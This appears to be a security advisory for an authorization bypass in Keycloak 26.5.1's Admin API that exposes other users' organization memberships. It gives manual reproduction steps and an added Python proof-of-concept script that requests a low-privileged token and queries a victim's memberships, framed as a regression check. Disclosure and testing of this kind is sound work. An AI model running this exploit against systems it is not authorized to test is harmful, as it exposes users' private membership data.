Keycloak
cpe:2.3:a:redhat:keycloak:*:*:*:*:*:*:*
- 26.5.1
An authorization bypass vulnerability has been identified in the Keycloak Admin API in version 26.5.1. Any authenticated user, with or without administrative privileges, can enumerate the organization memberships of other users. The flaw is reachable only when the Organizations feature is enabled, and the attacker must know the victim's user ID (UUID).
Successful exploitation results in unauthorized information disclosure: a user with no administrative role can read the organization membership details of other users, information the Admin API is expected to protect behind its permission checks.
To reproduce the issue on a Keycloak 26.5.1 instance:
- Enable the Organizations feature and create several organizations in the realm.
- Create a victim user and add them as a member of several of those organizations.
- Create a second, low-privileged user with no administrative roles, and obtain an OIDC access token for that user (for example via the direct access grant, i.e. password, flow).
- Using the low-privileged token, send a GET request to the organizations membership endpoint for the victim's UUID.
Because the caller holds no administrative role, the server should reject the request (HTTP 403). Instead it responds with the list of the victim's organization memberships, confirming that the expected permission check is bypassed.
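The procedure above, scripted as an added example (this is not Keycloak code and not part of the original advisory). It assumes: a realm name, a low-privileged user's credentials and a victim UUID supplied on the command line; the public `admin-cli` client with direct access grants enabled, which is the Keycloak default; the Keycloak token endpoint `/realms/{realm}/protocol/openid-connect/token`; and that the "organizations membership endpoint" is the Keycloak 26 admin path `/admin/realms/{realm}/organizations/members/{user-id}/organizations`, which is an assumption on my part since the advisory does not name the path. The `classify` function encodes the expected behaviour: a 403/401 means the permission check held, a 200 with a JSON list means it was bypassed.

```python
"""Reproduction harness for the Keycloak organization-membership authorization
bypass. Added example, not Keycloak project code. Endpoint paths, realm, client
and credentials are assumptions documented below."""
import json
import sys
import urllib.error
import urllib.parse
import urllib.request

# Standard Keycloak OIDC token endpoint.
TOKEN_PATH = "/realms/{realm}/protocol/openid-connect/token"
# Assumed admin REST path that lists the organizations a given user belongs to.
MEMBER_ORGS_PATH = "/admin/realms/{realm}/organizations/members/{user_id}/organizations"


def token_request(base_url, realm, username, password, client_id="admin-cli"):
    """Build the direct access grant (password flow) request for the
    low-privileged user. admin-cli is assumed to be public with the flow enabled."""
    url = base_url.rstrip("/") + TOKEN_PATH.format(realm=realm)
    body = urllib.parse.urlencode({
        "grant_type": "password",
        "client_id": client_id,
        "username": username,
        "password": password,
    }).encode()
    return url, body


def membership_request(base_url, realm, victim_id, access_token):
    """Build the GET against the (assumed) membership endpoint for the victim UUID,
    authenticated with the low-privileged user's bearer token."""
    url = base_url.rstrip("/") + MEMBER_ORGS_PATH.format(realm=realm, user_id=victim_id)
    headers = {"Authorization": "Bearer " + access_token, "Accept": "application/json"}
    return url, headers


def classify(status, body):
    """Interpret the membership endpoint's answer.

    Returns (verdict, organization_names). A non-admin caller should get 403
    (or 401 for a bad token): verdict "denied". A 200 carrying a JSON list means
    the permission check was skipped: verdict "vulnerable", whether or not the
    victim happens to belong to any organization. Anything else is "unexpected".
    """
    if status in (401, 403):
        return "denied", []
    if status != 200:
        return "unexpected", []
    try:
        orgs = json.loads(body)
    except ValueError:
        return "unexpected", []
    if not isinstance(orgs, list):
        return "unexpected", []
    names = [o.get("name") or o.get("alias") or o.get("id")
             for o in orgs if isinstance(o, dict)]
    return "vulnerable", names


def http(url, data=None, headers=None):
    """Minimal HTTP helper: returns (status, body) and does not raise on 4xx/5xx."""
    req = urllib.request.Request(url, data=data, headers=headers or {},
                                 method="POST" if data is not None else "GET")
    try:
        with urllib.request.urlopen(req, timeout=10) as resp:
            return resp.status, resp.read().decode()
    except urllib.error.HTTPError as err:
        return err.code, err.read().decode()


def main(argv):
    if len(argv) != 6:
        print("usage: repro.py BASE_URL REALM LOWPRIV_USER LOWPRIV_PASS VICTIM_UUID",
              file=sys.stderr)
        return 2
    base_url, realm, user, password, victim = argv[1:]
    status, body = http(*token_request(base_url, realm, user, password))
    if status != 200:
        print("token request failed:", status, body, file=sys.stderr)
        return 2
    token = json.loads(body)["access_token"]
    url, headers = membership_request(base_url, realm, victim, token)
    verdict, names = classify(*http(url, headers=headers))
    print(verdict, names)
    # Exit 0 only when the server denied the request as it should.
    return 0 if verdict == "denied" else 1


if __name__ == "__main__":
    sys.exit(main(sys.argv))
```

Run it as `python3 repro.py https://keycloak.example.com myrealm lowpriv 'password' <victim-uuid>`. On an unpatched 26.5.1 instance it prints `vulnerable` followed by the victim's organization names and exits 1; on a server that enforces the permission check it prints `denied` and exits 0, which makes the script usable as a regression check after upgrading.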